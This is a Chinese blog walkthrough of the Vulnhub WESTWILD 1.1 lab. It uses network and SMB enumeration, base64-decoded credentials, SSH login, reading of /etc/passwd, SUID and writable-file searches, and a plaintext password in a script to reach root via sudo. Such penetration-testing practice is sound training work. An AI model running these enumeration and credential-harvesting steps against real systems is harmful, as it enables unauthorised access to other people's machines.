Vulnhub:WESTWILD: 1.1

news2024/11/17 15:39:58

目录

信息收集

arp

nmap

nikto

whatweb

WEB

web信息收集

dirmap

enm4ulinux

sumbclient

get flag1

ssh登录

提权

横向移动

get root


信息收集

arp
┌──(root㉿ru)-[~/kali/vulnhub]
└─# arp-scan -l               
Interface: eth0, type: EN10MB, MAC: 00:50:56:2f:dd:99, IPv4: 192.168.211.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.211.1  00:50:56:c0:00:08  VMware, Inc.
192.168.211.2  00:50:56:e6:61:4b  VMware, Inc.
192.168.211.132  00:50:56:2f:56:a4  VMware, Inc.
192.168.211.254  00:50:56:e5:9d:26  VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.106 seconds (121.56 hosts/sec). 4 responded


nmap
端口探测

┌──(root㉿ru)-[~/kali/vulnhub]
└─# nmap -p- 192.168.211.132 --min-rate 10000                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-03 16:45 CST
Nmap scan report for 192.168.211.132
Host is up (0.0030s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:50:56:2F:56:A4 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 8.55 seconds

服务把版本信息探测

┌──(root㉿ru)-[~/kali/vulnhub]
└─# nmap -sC -sV -O -p 22,80,139,445 192.168.211.132 --min-rate 10000            
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-03 16:46 CST
Nmap scan report for 192.168.211.132
Host is up (0.00051s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 6f:ee:95:91:9c:62:b2:14:cd:63:0a:3e:f8:10:9e:da (DSA)
|   2048 10:45:94:fe:a7:2f:02:8a:9b:21:1a:31:c5:03:30:48 (RSA)
|   256 97:94:17:86:18:e2:8e:7a:73:8e:41:20:76:ba:51:73 (ECDSA)
|_  256 23:81:c7:76:bb:37:78:ee:3b:73:e2:55:ad:81:32:72 (ED25519)
80/tcp  open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 00:50:56:2F:56:A4 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: WESTWILD; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: WESTWILD, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2024-03-31T08:51:15
|_  start_date: N/A
|_clock-skew: mean: -3d00h55m18s, deviation: 1h43m55s, median: -2d23h55m18s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: westwild
|   NetBIOS computer name: WESTWILD\x00
|   Domain name: \x00
|   FQDN: westwild
|_  System time: 2024-03-31T11:51:15+03:00

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.48 seconds


nikto
┌──(root㉿ru)-[~/kali/vulnhub]
└─# nikto -h 192.168.211.132            
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.211.132
+ Target Hostname:    192.168.211.132
+ Target Port:        80
+ Start Time:         2024-04-03 16:45:16 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 107, size: 58edd5b41963c, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: OPTIONS, GET, HEAD, POST .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2024-04-03 16:45:46 (GMT8) (30 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


whatweb
┌──(root㉿ru)-[~/kali/vulnhub]
└─# whatweb -v 192.168.211.132              
WhatWeb report for http://192.168.211.132
Status    : 200 OK
Title     : <None>
IP        : 192.168.211.132
Country   : RESERVED, ZZ

Summary   : Apache[2.4.7], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)]

Detected Plugins:
[ Apache ]
  The Apache HTTP Server Project is an effort to develop and 
  maintain an open-source HTTP server for modern operating 
  systems including UNIX and Windows NT. The goal of this 
  project is to provide a secure, efficient and extensible 
  server that provides HTTP services in sync with the current 
  HTTP standards. 

  Version      : 2.4.7 (from HTTP Server Header)
  Google Dorks: (3)
  Website     : http://httpd.apache.org/

[ HTML5 ]
  HTML version 5, detected by the doctype declaration 


[ HTTPServer ]
  HTTP server header string. This plugin also attempts to 
  identify the operating system from the server header. 

  OS           : Ubuntu Linux
  String       : Apache/2.4.7 (Ubuntu) (from server string)

HTTP Headers:
  HTTP/1.1 200 OK
  Date: Sun, 31 Mar 2024 08:50:04 GMT
  Server: Apache/2.4.7 (Ubuntu)
  Last-Modified: Tue, 30 Jul 2019 03:10:53 GMT
  ETag: "107-58edd5b41963c-gzip"
  Accept-Ranges: bytes
  Vary: Accept-Encoding
  Content-Encoding: gzip
  Content-Length: 185
  Connection: close
  Content-Type: text/html

WEB

web信息收集

dirmap
┌──(root?ru)-[~/tools/dirscan/dirmap]
└─# python3 dirmap.py -i 192.168.211.132 -lcf                       

                     #####  # #####  #    #   ##   #####
                     #    # # #    # ##  ##  #  #  #    #
                     #    # # #    # # ## # #    # #    #
                     #    # # #####  #    # ###### #####
                     #    # # #   #  #    # #    # #
                     #####  # #    # #    # #    # #   v1.0

[*] Initialize targets...
[+] Load targets from: 192.168.211.132
[+] Set the number of thread: 30
[+] Coroutine mode
[+] Current target: http://192.168.211.132/                                                                    
[*] Launching auto check 404
[+] Checking with: http://192.168.211.132/wclgksfjylppmbqjujtouebignlgrrarfkwulfflgl
[*] Use recursive scan: No                                                                                     
[*] Use dict mode
[+] Load dict:/root/tools/dirscan/dirmap/data/dict_mode_dict.txt
[*] Use crawl mode
[200][text/html][185.00b] http://192.168.211.132/index.html                                                    
 99% (5694 of 5716) |################################################### | Elapsed Time: 0:00:14 ETA:   0:00:00
┌──(root㉿ru)-[~/tools/dirscan/dirmap/output]
└─# cat 192.168.211.132.txt 
[200][text/html][185.00b] http://192.168.211.132/index.html

ok,啥也没有!

enm4ulinux
enum4linux -a -r 192.168.211.132

发现公共目录wave

sumbclient
┌──(root㉿ru)-[~/kali/vulnhub]
└─# smbclient //192.168.211.132/wave
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jul 30 13:18:56 2019
  ..                                  D        0  Fri Aug  2 07:02:20 2019
  FLAG1.txt                           N       93  Tue Jul 30 10:31:05 2019
  message_from_aveng.txt              N      115  Tue Jul 30 13:21:48 2019

    1781464 blocks of size 1024. 261904 blocks available
smb: \> get FLAG1.txt 
getting file \FLAG1.txt of size 93 as FLAG1.txt (13.0 KiloBytes/sec) (average 13.0 KiloBytes/sec)
smb: \> get message_from_aveng.txt 
getting file \message_from_aveng.txt of size 115 as message_from_aveng.txt (22.5 KiloBytes/sec) (average 16.9 KiloBytes/sec)
smb: \> 


get flag1
┌──(root㉿ru)-[~/kali/vulnhub]
└─# cat FLAG1.txt                                                                                   
RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K
                                                                                                                                                                                          
┌──(root㉿ru)-[~/kali/vulnhub]
└─# cat message_from_aveng.txt 
Dear Wave ,
Am Sorry but i was lost my password ,
and i believe that you can reset  it for me . 
Thank You 
Aveng
┌──(root㉿ru)-[~/kali/vulnhub]
└─# echo "RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K" | base64
 -d
Flag1{Welcome_T0_THE-W3ST-W1LD-B0rder}
user:wavex
password:door+open


ssh登录
┌──(root㉿ru)-[~/kali/vulnhub]
└─# ssh wavex@192.168.211.132          
The authenticity of host '192.168.211.132 (192.168.211.132)' can't be established.
ED25519 key fingerprint is SHA256:oeuytnbnPest0/m/OtTQyjaFSRv03+EMhBmAX886bsk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.211.132' (ED25519) to the list of known hosts.
wavex@192.168.211.132's password: 
Welcome to Ubuntu 14.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Mar 31 19:46:00 +03 2024

  System load: 0.0               Memory usage: 5%   Processes:       172
  Usage of /:  77.9% of 1.70GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Fri Aug  2 02:00:40 2019
wavex@WestWild:~$ 

提权

横向移动
wavex@WestWild:~/wave$ ls -alR .
.:
total 16
drwxrwxrwx 2 nobody nogroup 4096 Jul 30  2019 .
drwxr-xr-x 4 wavex  wavex   4096 Aug  2  2019 ..
-rw-rw-r-- 1 wavex  wavex     93 Jul 30  2019 FLAG1.txt
-rw-r--r-- 1 wavex  wavex    115 Jul 30  2019 message_from_aveng.txt
wavex@WestWild:~/wave$ 

wavex@WestWild:~/wave$ ls -al /etc/passwd /etc/shadow
-rw-r--r-- 1 root root   1261 Jul 30  2019 /etc/passwd
-rw-r----- 1 root shadow  993 Aug  2  2019 /etc/shado
wavex@WestWild:~/wave$ cat /etc/passwd | grep "home" | grep -v nologin
syslog:x:101:104::/home/syslog:/bin/false
aveng:x:1000:1000:aveng,,,:/home/aveng:/bin/bash
wavex:x:1001:1001:XxWavexX,,,:/home/wavex:/bin/bash

wavex@WestWild:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mtr
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/at
/usr/sbin/uuidd
/usr/sbin/pppd
/bin/ping6
/bin/fusermount
/bin/mount
/bin/ping
/bin/umount
/bin/su
/sbin/mount.cifs

wavex@WestWild:~$ find / -writable -type f ! -path '/proc/*' 2>/dev/null
/sys/fs/cgroup/systemd/user/1001.user/1.session/tasks
/sys/fs/cgroup/systemd/user/1001.user/1.session/cgroup.procs
/sys/kernel/security/apparmor/policy/.remove
/sys/kernel/security/apparmor/policy/.replace
/sys/kernel/security/apparmor/policy/.load
/sys/kernel/security/apparmor/.remove
/sys/kernel/security/apparmor/.replace
/sys/kernel/security/apparmor/.load
/sys/kernel/security/apparmor/.ns_name
/sys/kernel/security/apparmor/.ns_level
/sys/kernel/security/apparmor/.ns_stacked
/sys/kernel/security/apparmor/.stacked
/sys/kernel/security/apparmor/.access
/usr/share/av/westsidesecret/ififoregt.sh
/home/wavex/.cache/motd.legal-displayed
/home/wavex/wave/FLAG1.txt
/home/wavex/wave/message_from_aveng.txt
/home/wavex/.profile
/home/wavex/.bashrc
/home/wavex/.viminfo
/home/wavex/.bash_logout
wavex@WestWild:~$ cat /usr/share/av/westsidesecret/ififoregt.sh
 #!/bin/bash 
 figlet "if i foregt so this my way"
 echo "user:aveng"
 echo "password:kaizen+80"
 


wavex@WestWild:~$ 


get root
aveng@WestWild:~$ sudo -l
[sudo] password for aveng: 
Matching Defaults entries for aveng on WestWild:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User aveng may run the following commands on WestWild:
    (ALL : ALL) ALL
    
aveng@WestWild:~$ sudo su
root@WestWild:/home/aveng# id
uid=0(root) gid=0(root) groups=0(root)
root@WestWild:/home/aveng# 

root@WestWild:~# cat FLAG2.txt 
Flag2{Weeeeeeeeeeeellco0o0om_T0_WestWild}

Great! take a screenshot and Share it with me in twitter @HashimAlshareff 




root@WestWild:~# 


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1567835.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Springboot Thymeleaf 实现数据添加、修改、查询、删除

1、引言 在Spring Boot中使用Thymeleaf模板引擎实现数据的添加、修改、查询和删除功能&#xff0c;通常步骤如下&#xff1a; 在Controller类中&#xff0c;定义处理HTTP请求的方法。创建Thymeleaf模板来处理表单的显示和数据的绑定。 2、用户数据添加 1、 在Controller类中…

2024年福建三支一扶报名指南—照片<100kb

2024年福建三支一扶报名指南—照片<100kb

目标检测——监控下的汽车

一、重要性及意义 首先&#xff0c;车辆检测技术是保证视频监控系统正常运行的基础。通过监控摄像头实时获取的图像&#xff0c;可以自动检测出图像中的车辆&#xff0c;并进行车辆类型的分类和识别。这对于优化城市交通管理、实现智能交通系统具有重要意义。此外&#xff0c;…

智能小车测速(3.26)

模块介绍&#xff1a; 接线&#xff1a; VCC -- 3.3V 不能接5V&#xff0c;否则遮挡一次会触发3次中断 OUT -- PB14 测速原理&#xff1a; cubeMX设置&#xff1a; PB14设置为gpio中断 打开定时器2&#xff0c;时钟来源设置为内部时钟&#xff0c;设置溢出时间1s&#xff0c…

通义灵码功能上线:编程挑战中Claude3(opus)领先一步

最近好多AI博主都在推荐通义灵码&#xff0c;我就下载下来体验了一下&#xff0c;而且目前通义灵码暂时不收费&#xff0c;而且还有一个推荐奖励的活动&#xff0c;活动内容如下&#xff1a; 邀请好友达到一定人数&#xff0c;有一些奖励。 我目前看到微软的Azure云有个语音转…

LabVIEW电力设备在线监测系统

LabVIEW电力设备在线监测系统 在电力行业中&#xff0c;变电站的稳定运行对于保障电力系统的安全性和可靠性至关重要。开发了一种基于LabVIEW软件开发的变电站电力设备在线监测系统&#xff0c;实时监控变电站内部的电力设备状态&#xff0c;确保电力传输的高效与安全。通过对…

Java—抽象方法与接口

声明&#xff1a;以下内容是根据B站黑马程序员的Java课程&#xff0b;博主自己的理解整理而成&#xff0c;课程很好&#xff0c;适合初学者学习。 关于此类题目&#xff0c;重要的是识别出用什么来实现&#xff0c;到底是接口还是抽象方法&#xff0c;还是共有的属性等等&…

React之Diff 算法

在 React 中&#xff0c;通过 React.createElement 也能生成一个虚拟 DOM 节点&#xff08;ReactElement&#xff09;。在 React15 及以前&#xff0c;采用了递归的方式创建虚拟 DOM&#xff0c;递归过程是不能中断的。如果组件树的层级很深&#xff0c;递归会占用线程很多时间…

达梦配置ODBC连接

达梦配置ODBC连接 基础环境 操作系统&#xff1a;Red Hat Enterprise Linux Server release 7.9 (Maipo) 数据库版本&#xff1a;DM Database Server 64 V8 架构&#xff1a;单实例1 下载ODBC包 下载网址&#xff1a;https://www.unixodbc.org/ unixODBC-2.3.0.tar.gz2 编译并…

树状数组-数据结构

树状数组 t[x] 节点的父节点为 t[x lowbit(x)] 整棵树的深度为 log2n 1 1 . add(x,k) 给指定的节点x加上k — 动态的维护前缀和 需要从x开始&#xff0c;向上找到所有父节点&#xff0c;值都加上k 2. ask(x) 求取节点x之前的前缀和 求取单点之前的前缀和只需要累加即可 …

redis群集有三种模式

目录 redis群集有三种模式 redis群集有三种模式 分别是主从同步/复制、哨兵模式、Cluster ●主从复制&#xff1a;主从复制是高可用Redis的基础&#xff0c;哨兵和集群都是在主从复制基础上实现高可用的。主从复制主要实现了数据的多机备份&#xff0c;以及对于读操作的负载均…

LeetCode | 数组 | 二分查找 | 35.搜索插入位置【C++】

题目链接 题目描述 给定一个排序数组和一个目标值&#xff0c;在数组中找到目标值&#xff0c;并返回其索引。如果目标值不存在于数组中&#xff0c;返回它将会被按顺序插入的位置。 请必须使用时间复杂度为 O(log n) 的算法。 示例 1: 输入: nums [1,3,5,6], target 5 输出…

数据结构——图的应用(最小生成树,最短路径,拓扑排序,关键路径)

目录 1.最小生成树 1.概念回顾——生成树 2.最小生成树概念 2.构造最小生成树 1.MST性质 2.Prim算法 3.Kruskal 算法 4.两种算法比较 3.最短路径 1.两点间最短路径 2.某源点到其它各点最短路径 3.单源最短路径——用Dijkstra算法 4.所有顶点间的最短路径…

Echarts 自适应宽高,或指定宽高进行自适应

文章目录 需求分析 需求 有一个按钮实现对Echarts的指定缩放与拉长&#xff0c;形成自适应效果 拉长后效果图 该块元素缩短后效果图 分析 因为我习惯使用 ref 来获取组件的 DOM 元素&#xff0c;然后进行挂载 <div ref"echartsRef" id"myDiv" :sty…

Shell脚本之基本语法

目录 一、变量定义 变量命名规则&#xff1a; 变量的赋值&#xff1a; 只读变量&#xff1a; 删除变量&#xff1a; 二、变量的类型 自定义变量&#xff1a; 环境变量&#xff1a; 位置参数&#xff1a; 预定义变量&#xff1a; 三、键盘输入 四、数值运算 为什么…

余集和拉格朗日定理

L&#xff1a;一个群的例子&#xff08;在下面的文章中进一步详细介绍&#xff09;;R&#xff1a;约瑟夫路易拉格朗日&#xff08;1736-1813&#xff09;&#xff0c; 一、说明 数学家总是痴迷于根据乍一看似乎完全无关的事实/观察来形成概括。为什么&#xff1f;原因很简单&am…

ideaSSM图书借阅管理系统VS开发mysql数据库web结构java编程计算机网页源码maven项目

一、源码特点 SSM 图书借阅管理系统是一套完善的信息管理系统&#xff0c;结合SSM框架和bootstrap完成本系统&#xff0c;对理解JSP java编程开发语言有帮助系统采用SSM框架&#xff08;MVC模式开发&#xff09;&#xff0c;系统具有完整的源代码 和数据库&#xff0c;系统主…

JS-11A/11时间继电器 板前接线 JOSEF约瑟

系列型号&#xff1a; JS-11A/11集成电路时间继电器&#xff1b;JS-11A/12集成电路时间继电器&#xff1b; JS-11A/13集成电路时间继电器&#xff1b;JS-11A/136集成电路时间继电器&#xff1b; JS-11A/137集成电路时间继电器&#xff1b;JS-11A/22集成电路时间继电器&#…

一点点金融 4

一点点金融 4 第一性原理&#xff1a;关键事件前后&#xff0c;市场会从不确定性转变为确定性弹簧板、天花板&#xff1a;作为止损、换策略的依据怎么判断弹簧板、天花板&#xff1f; 第一性原理&#xff1a;关键事件前后&#xff0c;市场会从不确定性转变为确定性 在关键事件…

74LVC04六角逆变器-国产兼容MS9113

MS9113S 是一款 S/PDIF 信号接收器。当输入信号频率为 0.1MHz 至 40MHz 时&#xff0c;芯片放大该输入信号至电源电压。最小输入信号幅度的典型值为 80mV。MS9113S 包含一个信号标识位管脚&#xff0c;有输入信号则为高电平&#xff0c;无输入信号则为低电平。MS9113S 还包含一…